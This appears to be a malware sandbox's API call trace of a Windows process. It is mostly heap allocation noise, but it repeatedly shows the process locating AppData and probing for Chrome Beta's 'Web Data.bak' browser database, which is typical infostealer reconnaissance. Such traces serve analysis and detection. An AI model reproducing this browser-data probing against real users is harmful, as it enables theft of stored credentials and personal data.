[0180.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0180.239] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613440 [0180.239] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x613440, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The system cannot find the path specified.\r\n", lpUsedDefaultChar=0x0) returned 45 [0180.239] LocalFree (hMem=0x6186b0) returned 0x0 [0180.239] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.239] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.239] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625150) returned 0xb0 [0180.239] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625150 | out: hHeap=0x5f0000) returned 1 [0180.239] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625990) returned 0x3c8 [0180.239] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625990 | out: hHeap=0x5f0000) returned 1 [0180.239] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x61cca0) returned 0x88 [0180.239] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61cca0 | out: hHeap=0x5f0000) returned 1 [0180.239] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x620190) returned 0x48 [0180.239] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620190 | out: hHeap=0x5f0000) returned 1 [0180.239] GetLastError () returned 0x3 [0180.239] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x618290) returned 0x60 [0180.240] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618290 | out: hHeap=0x5f0000) returned 1 [0180.240] GetProcessHeap () returned 0x5f0000 [0180.240] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2d) returned 0x613440 [0180.240] GetProcessHeap () returned 0x5f0000 [0180.240] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3f0 [0180.240] lstrlenA (lpString="") returned 0 [0180.240] GetProcessHeap () returned 0x5f0000 [0180.240] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2c0 [0180.240] lstrcpyA (in: lpString1=0x61f2c0, lpString2="" | out: lpString1="") returned="" [0180.240] GetProcessHeap () returned 0x5f0000 [0180.240] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2d) returned 0x613950 [0180.240] GetProcessHeap () returned 0x5f0000 [0180.240] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f370 [0180.240] ResetEvent (hEvent=0xc) returned 1 [0180.240] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.268] GetProcessHeap () returned 0x5f0000 [0180.268] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f370 | out: hHeap=0x5f0000) returned 1 [0180.268] GetProcessHeap () returned 0x5f0000 [0180.268] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613950 | out: hHeap=0x5f0000) returned 1 [0180.268] GetProcessHeap () returned 0x5f0000 [0180.268] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f2c0 | out: hHeap=0x5f0000) returned 1 [0180.268] GetProcessHeap () returned 0x5f0000 [0180.268] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3f0 | out: hHeap=0x5f0000) returned 1 [0180.268] GetProcessHeap () returned 0x5f0000 [0180.268] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.268] lstrlenA (lpString="unable to open database file") returned 28 [0180.268] GetProcessHeap () returned 0x5f0000 [0180.268] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1d) returned 0x615ce0 [0180.268] lstrcpyA (in: lpString1=0x615ce0, lpString2="unable to open database file" | out: lpString1="unable to open database file") returned="unable to open database file" [0180.269] GetProcessHeap () returned 0x5f0000 [0180.269] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f2e0 [0180.269] lstrlenA (lpString="") returned 0 [0180.269] GetProcessHeap () returned 0x5f0000 [0180.269] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f370 [0180.269] lstrcpyA (in: lpString1=0x61f370, lpString2="" | out: lpString1="") returned="" [0180.269] GetProcessHeap () returned 0x5f0000 [0180.269] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1d) returned 0x615d20 [0180.269] GetProcessHeap () returned 0x5f0000 [0180.269] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f460 [0180.269] ResetEvent (hEvent=0xc) returned 1 [0180.269] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.299] GetProcessHeap () returned 0x5f0000 [0180.299] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f460 | out: hHeap=0x5f0000) returned 1 [0180.299] GetProcessHeap () returned 0x5f0000 [0180.299] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d20 | out: hHeap=0x5f0000) returned 1 [0180.299] GetProcessHeap () returned 0x5f0000 [0180.299] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f370 | out: hHeap=0x5f0000) returned 1 [0180.299] GetProcessHeap () returned 0x5f0000 [0180.299] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f2e0 | out: hHeap=0x5f0000) returned 1 [0180.299] GetProcessHeap () returned 0x5f0000 [0180.299] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x5f0000) returned 1 [0180.299] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6250c0) returned 0x80 [0180.299] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6250c0 | out: hHeap=0x5f0000) returned 1 [0180.299] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x624a20) returned 0x80 [0180.299] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624a20 | out: hHeap=0x5f0000) returned 1 [0180.299] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x611f60) returned 0x80 [0180.299] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.299] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615ca0) returned 0x20 [0180.299] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.300] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615f60) returned 0x20 [0180.300] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.300] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615ea0) returned 0x20 [0180.300] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.300] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613320) returned 0x30 [0180.300] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.300] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x624e10) returned 0x2a0 [0180.300] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624e10 | out: hHeap=0x5f0000) returned 1 [0180.300] GetProcessHeap () returned 0x5f0000 [0180.300] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624d50 | out: hHeap=0x5f0000) returned 1 [0180.300] GetProcessHeap () returned 0x5f0000 [0180.300] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.300] GetProcessHeap () returned 0x5f0000 [0180.300] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615ea0 [0180.300] GetProcessHeap () returned 0x5f0000 [0180.300] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615f60 [0180.300] GetProcessHeap () returned 0x5f0000 [0180.300] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f460 [0180.300] lstrlenA (lpString="") returned 0 [0180.300] GetProcessHeap () returned 0x5f0000 [0180.301] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3d0 [0180.301] lstrcpyA (in: lpString1=0x61f3d0, lpString2="" | out: lpString1="") returned="" [0180.301] GetProcessHeap () returned 0x5f0000 [0180.301] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1b) returned 0x615ca0 [0180.301] GetProcessHeap () returned 0x5f0000 [0180.301] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f370 [0180.301] ResetEvent (hEvent=0xc) returned 1 [0180.301] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.322] GetProcessHeap () returned 0x5f0000 [0180.322] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f370 | out: hHeap=0x5f0000) returned 1 [0180.322] GetProcessHeap () returned 0x5f0000 [0180.322] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.322] GetProcessHeap () returned 0x5f0000 [0180.322] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3d0 | out: hHeap=0x5f0000) returned 1 [0180.322] GetProcessHeap () returned 0x5f0000 [0180.322] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f460 | out: hHeap=0x5f0000) returned 1 [0180.322] GetProcessHeap () returned 0x5f0000 [0180.323] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.323] GetProcessHeap () returned 0x5f0000 [0180.323] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.323] GetProcessHeap () returned 0x5f0000 [0180.323] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2a0 [0180.323] GetProcessHeap () returned 0x5f0000 [0180.323] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3e0 [0180.323] GetProcessHeap () returned 0x5f0000 [0180.323] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f320 [0180.323] GetProcessHeap () returned 0x5f0000 [0180.323] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2c0 [0180.323] GetProcessHeap () returned 0x5f0000 [0180.323] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f370 [0180.323] GetProcessHeap () returned 0x5f0000 [0180.323] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.324] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.324] GetProcessHeap () returned 0x5f0000 [0180.324] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.324] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cf540, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.324] GetProcessHeap () returned 0x5f0000 [0180.324] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3d0 [0180.324] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.324] GetProcessHeap () returned 0x5f0000 [0180.324] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.325] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.325] GetProcessHeap () returned 0x5f0000 [0180.325] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.325] GetProcessHeap () returned 0x5f0000 [0180.325] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x93) returned 0x611f60 [0180.325] GetProcessHeap () returned 0x5f0000 [0180.325] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x620690 [0180.325] GetProcessHeap () returned 0x5f0000 [0180.325] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620690, Size=0xa3) returned 0x624900 [0180.325] GetProcessHeap () returned 0x5f0000 [0180.325] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x52) returned 0x618290 [0180.325] GetProcessHeap () returned 0x5f0000 [0180.325] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x618290, Size=0xab) returned 0x6249c0 [0180.325] GetProcessHeap () returned 0x5f0000 [0180.325] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f370, Size=0x56) returned 0x6187d0 [0180.325] GetProcessHeap () returned 0x5f0000 [0180.325] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6249c0 | out: hHeap=0x5f0000) returned 1 [0180.325] GetProcessHeap () returned 0x5f0000 [0180.325] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.325] GetProcessHeap () returned 0x5f0000 [0180.326] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.326] GetProcessHeap () returned 0x5f0000 [0180.326] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.326] GetProcessHeap () returned 0x5f0000 [0180.326] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3d0 | out: hHeap=0x5f0000) returned 1 [0180.326] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.326] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Web Data.bak") returned 0 [0180.326] GetProcessHeap () returned 0x5f0000 [0180.326] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6187d0 | out: hHeap=0x5f0000) returned 1 [0180.326] GetProcessHeap () returned 0x5f0000 [0180.326] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f2c0 | out: hHeap=0x5f0000) returned 1 [0180.326] GetProcessHeap () returned 0x5f0000 [0180.326] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x615ca0 [0180.326] GetProcessHeap () returned 0x5f0000 [0180.326] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x615ce0 [0180.326] GetProcessHeap () returned 0x5f0000 [0180.326] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3f0 [0180.326] lstrlenA (lpString="") returned 0 [0180.326] GetProcessHeap () returned 0x5f0000 [0180.326] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2e0 [0180.326] lstrcpyA (in: lpString1=0x61f2e0, lpString2="" | out: lpString1="") returned="" [0180.326] GetProcessHeap () returned 0x5f0000 [0180.326] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x615f60 [0180.326] GetProcessHeap () returned 0x5f0000 [0180.326] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f410 [0180.326] ResetEvent (hEvent=0xc) returned 1 [0180.326] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.354] GetProcessHeap () returned 0x5f0000 [0180.354] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f410 | out: hHeap=0x5f0000) returned 1 [0180.354] GetProcessHeap () returned 0x5f0000 [0180.354] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.354] GetProcessHeap () returned 0x5f0000 [0180.354] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f2e0 | out: hHeap=0x5f0000) returned 1 [0180.354] GetProcessHeap () returned 0x5f0000 [0180.354] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3f0 | out: hHeap=0x5f0000) returned 1 [0180.354] GetProcessHeap () returned 0x5f0000 [0180.354] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x5f0000) returned 1 [0180.354] GetProcessHeap () returned 0x5f0000 [0180.354] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.354] GetProcessHeap () returned 0x5f0000 [0180.354] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f370 [0180.354] GetProcessHeap () returned 0x5f0000 [0180.354] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.355] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.355] GetProcessHeap () returned 0x5f0000 [0180.355] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.355] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cf590, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.355] GetProcessHeap () returned 0x5f0000 [0180.355] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f380 [0180.355] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.355] GetProcessHeap () returned 0x5f0000 [0180.355] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.355] lstrcpyA (in: lpString1=0x613440, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.355] GetProcessHeap () returned 0x5f0000 [0180.355] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.355] GetProcessHeap () returned 0x5f0000 [0180.355] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x93) returned 0x611f60 [0180.355] GetProcessHeap () returned 0x5f0000 [0180.355] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x6207d0 [0180.356] GetProcessHeap () returned 0x5f0000 [0180.356] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6207d0, Size=0xa3) returned 0x624900 [0180.356] GetProcessHeap () returned 0x5f0000 [0180.356] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x52) returned 0x6187d0 [0180.356] GetProcessHeap () returned 0x5f0000 [0180.356] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6187d0, Size=0xab) returned 0x6249c0 [0180.356] GetProcessHeap () returned 0x5f0000 [0180.356] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f370, Size=0x56) returned 0x6186b0 [0180.356] GetProcessHeap () returned 0x5f0000 [0180.356] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6249c0 | out: hHeap=0x5f0000) returned 1 [0180.356] GetProcessHeap () returned 0x5f0000 [0180.356] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.356] GetProcessHeap () returned 0x5f0000 [0180.356] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.356] GetProcessHeap () returned 0x5f0000 [0180.356] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.356] GetProcessHeap () returned 0x5f0000 [0180.356] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f380 | out: hHeap=0x5f0000) returned 1 [0180.357] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.357] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Web Data.bak") returned 0 [0180.357] GetProcessHeap () returned 0x5f0000 [0180.357] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6186b0 | out: hHeap=0x5f0000) returned 1 [0180.357] GetProcessHeap () returned 0x5f0000 [0180.357] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613320 [0180.357] GetProcessHeap () returned 0x5f0000 [0180.357] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613440 [0180.357] GetProcessHeap () returned 0x5f0000 [0180.357] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f420 [0180.357] lstrlenA (lpString="") returned 0 [0180.357] GetProcessHeap () returned 0x5f0000 [0180.357] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f360 [0180.357] lstrcpyA (in: lpString1=0x61f360, lpString2="" | out: lpString1="") returned="" [0180.358] GetProcessHeap () returned 0x5f0000 [0180.358] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613890 [0180.358] GetProcessHeap () returned 0x5f0000 [0180.358] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f460 [0180.358] ResetEvent (hEvent=0xc) returned 1 [0180.358] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.387] GetProcessHeap () returned 0x5f0000 [0180.387] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f460 | out: hHeap=0x5f0000) returned 1 [0180.387] GetProcessHeap () returned 0x5f0000 [0180.387] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613890 | out: hHeap=0x5f0000) returned 1 [0180.387] GetProcessHeap () returned 0x5f0000 [0180.387] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f360 | out: hHeap=0x5f0000) returned 1 [0180.387] GetProcessHeap () returned 0x5f0000 [0180.387] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f420 | out: hHeap=0x5f0000) returned 1 [0180.387] GetProcessHeap () returned 0x5f0000 [0180.387] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.387] GetProcessHeap () returned 0x5f0000 [0180.387] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.387] GetProcessHeap () returned 0x5f0000 [0180.387] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2c0 [0180.387] GetProcessHeap () returned 0x5f0000 [0180.387] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ca0 [0180.388] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.388] GetProcessHeap () returned 0x5f0000 [0180.388] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.388] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cf2c0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.388] GetProcessHeap () returned 0x5f0000 [0180.388] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f330 [0180.388] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.388] GetProcessHeap () returned 0x5f0000 [0180.388] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.388] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.388] GetProcessHeap () returned 0x5f0000 [0180.388] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.388] GetProcessHeap () returned 0x5f0000 [0180.388] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x93) returned 0x611f60 [0180.389] GetProcessHeap () returned 0x5f0000 [0180.389] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x6205f0 [0180.389] GetProcessHeap () returned 0x5f0000 [0180.389] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6205f0, Size=0xa3) returned 0x624900 [0180.389] GetProcessHeap () returned 0x5f0000 [0180.389] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x52) returned 0x618b30 [0180.389] GetProcessHeap () returned 0x5f0000 [0180.389] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x618b30, Size=0xab) returned 0x6249c0 [0180.389] GetProcessHeap () returned 0x5f0000 [0180.389] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f2c0, Size=0x56) returned 0x618b30 [0180.389] GetProcessHeap () returned 0x5f0000 [0180.389] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6249c0 | out: hHeap=0x5f0000) returned 1 [0180.389] GetProcessHeap () returned 0x5f0000 [0180.389] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.389] GetProcessHeap () returned 0x5f0000 [0180.389] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.389] GetProcessHeap () returned 0x5f0000 [0180.389] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.389] GetProcessHeap () returned 0x5f0000 [0180.389] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f330 | out: hHeap=0x5f0000) returned 1 [0180.390] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.390] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Default\\Web Data.bak") returned 0 [0180.390] GetProcessHeap () returned 0x5f0000 [0180.390] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618b30 | out: hHeap=0x5f0000) returned 1 [0180.390] GetProcessHeap () returned 0x5f0000 [0180.390] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613320 [0180.390] GetProcessHeap () returned 0x5f0000 [0180.390] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613440 [0180.390] GetProcessHeap () returned 0x5f0000 [0180.390] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f2e0 [0180.390] lstrlenA (lpString="") returned 0 [0180.390] GetProcessHeap () returned 0x5f0000 